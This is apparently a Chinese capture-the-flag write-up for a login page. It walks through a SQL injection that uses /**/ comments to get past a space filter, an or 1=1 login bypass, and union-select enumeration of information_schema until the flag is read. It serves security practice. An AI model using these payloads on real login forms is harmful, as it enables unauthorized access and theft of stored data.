登陆窗,先想到sql注入
抓包测试发现失败
利用/**/代替空格进行绕过
username=admin'/**/or/**/1=1#&password=123456
利用联合查询找到回显位置
username=admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#&password=123456
查数据库名
username=admin'/**/or/**/1=1/**/union/**/select/**/1,database(),3#&password=123456
查询数据库内数据表名称
username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#&password=123456
发现了flag的表,查看该表字段名
username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#&password=123456
查询字段信息
username=admin'/**/or/**/1=1/**/union/**/select/**/1,flag,3/**/from/**/flag#&password=123456
得到flag